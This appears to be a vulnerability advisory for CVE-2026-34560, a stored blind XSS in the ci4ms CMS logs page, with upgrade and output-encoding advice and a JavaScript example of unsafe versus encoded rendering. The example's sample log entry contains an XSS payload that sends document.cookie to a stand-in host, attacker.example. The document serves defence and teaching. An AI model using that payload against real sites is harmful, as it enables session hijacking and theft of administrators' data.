Platform
php
Component
ci4-cms-erp/ci4ms
Fixed in
0.31.1
0.31.0.0
CVE-2026-34560 is a stored, blind, DOM-based cross-site scripting (XSS) vulnerability in the ci4-cms-erp/ci4ms application. User-controlled data that the application records in its logs is rendered in the logs interface without encoding, so an attacker can plant a script that executes in the browser of whoever later views those logs, which in practice is an administrator. The vulnerability affects ci4-cms-erp/ci4ms versions up to and including 0.28.6.0; a fix is available in version 0.31.0.0.
The impact is significant because the payload runs in an administrator's session. Arbitrary JavaScript executing in that context permits session hijacking, theft of sensitive data stored in the application, and defacement. The XSS is 'blind' in the sense that the attacker does not see the payload execute when it is submitted: it fires later, when an administrator opens the logs, so the attacker has to rely on an out-of-band callback (for example a request to a server they control) to learn that it ran. As with other blind XSS, the effect is delayed and less obvious, and the gap between injection and execution also makes it harder for defenders to correlate the two events.
CVE-2026-34560 was publicly disclosed on 2026-04-01. Because execution is deferred until the logs are viewed, an injected payload can sit unnoticed in stored log data, which widens the window of opportunity for exploitation. No public proof-of-concept exploit is known at the time of writing, but the severity and potential impact suggest the vulnerability could become a target. It is not currently listed in the CISA KEV catalog.
Exploit Status
EPSS
0.03% (8th percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2026-34560 is to upgrade to version 0.31.0.0 or later of ci4-cms-erp/ci4ms. If upgrading immediately is not possible, apply temporary workarounds, with the caveat that input validation alone is not enough here: log entries are built from request data the application records (header values, usernames, paths), not from data typed into the logs interface, and legitimate logs must be able to hold arbitrary characters. The reliable control is output encoding. HTML-encode every log field at the point where it is rendered, and in client-side code insert log values with textContent (or an equivalent DOM API) rather than innerHTML. A Web Application Firewall (WAF) with XSS rules can block obvious probes, but WAF filtering is bypassable and is a stopgap, not the fix. Review the application's other views that render request-derived data for the same unsafe pattern. After upgrading, confirm the fix by sending a harmless probe such as <img src=x onerror=alert(1)> in a field you know is logged, then opening the logs page and checking that the probe appears as encoded text rather than as an element.
Update ci4ms to version 0.31.0.0 or later. This version fixes the stored XSS vulnerability in the logs interface, preventing script execution when the logs are viewed.
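The unsafe rendering pattern described above and its encoded counterpart, as an added JavaScript example; this is not code from the ci4ms project, and the log row fields, the constructed User-Agent value, and the helper names (renderEntryUnsafe, renderEntrySafe, escapeHtml, appendEntryWithDom, foreignTags) are assumptions for illustration. The constructed entry models a log line that records a request header the attacker controls; the unsafe renderer concatenates it into markup destined for innerHTML, the safe renderer encodes each field first, and foreignTags is the post-upgrade check from the mitigation section: render a probe and confirm that no element other than the table's own appears in the output.

```javascript
// Added example, not ci4ms project code. Field names, helper names and the
// constructed log entry below are illustrative assumptions.

// Constructed log entry: the User-Agent header is attacker-controlled and the
// application is assumed to store it verbatim when it logs a failed login.
const CONSTRUCTED_ENTRY = {
  time: "2026-04-01T10:00:00Z",
  level: "error",
  message: "Login failed for user 'admin'",
  userAgent: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
};

// Vulnerable pattern: untrusted fields are concatenated into markup that the
// logs page then assigns to innerHTML, so a stored <img onerror> becomes a live element.
function renderEntryUnsafe(entry) {
  return `<tr><td>${entry.time}</td><td>${entry.level}</td>` +
    `<td>${entry.message}</td><td>${entry.userAgent}</td></tr>`;
}

// Minimal HTML entity encoder, safe for element content and quoted attribute values.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Fixed pattern: every untrusted field is encoded before it becomes markup.
function renderEntrySafe(entry) {
  const cells = [entry.time, entry.level, entry.message, entry.userAgent].map(escapeHtml);
  return `<tr>${cells.map((c) => `<td>${c}</td>`).join("")}</tr>`;
}

// Preferred fix when a real DOM is available (pass the browser's `document`):
// build nodes and set textContent, which is never parsed as HTML.
function appendEntryWithDom(tableBody, entry, doc) {
  const row = doc.createElement("tr");
  for (const field of [entry.time, entry.level, entry.message, entry.userAgent]) {
    const cell = doc.createElement("td");
    cell.textContent = field;
    row.appendChild(cell);
  }
  tableBody.appendChild(row);
  return row;
}

// Post-upgrade check: list element names in the rendered row that are not the
// table's own. A correctly encoded probe contributes nothing to this list.
function foreignTags(html, allowed = ["tr", "td"]) {
  const found = new Set();
  for (const m of html.matchAll(/<([a-z][a-z0-9]*)/gi)) {
    found.add(m[1].toLowerCase());
  }
  return [...found].filter((tag) => !allowed.includes(tag));
}

// Stand-alone run: the unsafe render leaks an <img> element, the safe one does not.
console.log(foreignTags(renderEntryUnsafe(CONSTRUCTED_ENTRY))); // ["img"]
console.log(foreignTags(renderEntrySafe(CONSTRUCTED_ENTRY)));   // []
```

The two string renderers run under Node as-is; appendEntryWithDom needs a browser, where you pass the table body element and `document`. On the server side the equivalent of escapeHtml in a CodeIgniter 4 view is the framework's esc() helper applied to each log field at output time.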
CVE-2026-34560 is a CRITICAL stored, blind, DOM-based XSS vulnerability in ci4-cms-erp/ci4ms: log data derived from user input is rendered without encoding, so an injected script can execute in an administrator's session when the logs are viewed.
You are affected if you are using ci4-cms-erp/ci4ms versions ≤0.28.6.0. Upgrade to 0.31.0.0 to mitigate the risk.
Upgrade to version 0.31.0.0 or later of ci4-cms-erp/ci4ms. Until then, HTML-encode log data at render time as a temporary workaround; input validation on its own does not address this issue.
There are currently no confirmed reports of active exploitation, but the vulnerability's severity warrants immediate attention and mitigation.
Refer to the ci4-cms-erp project's official advisory channels for the most up-to-date information and security announcements.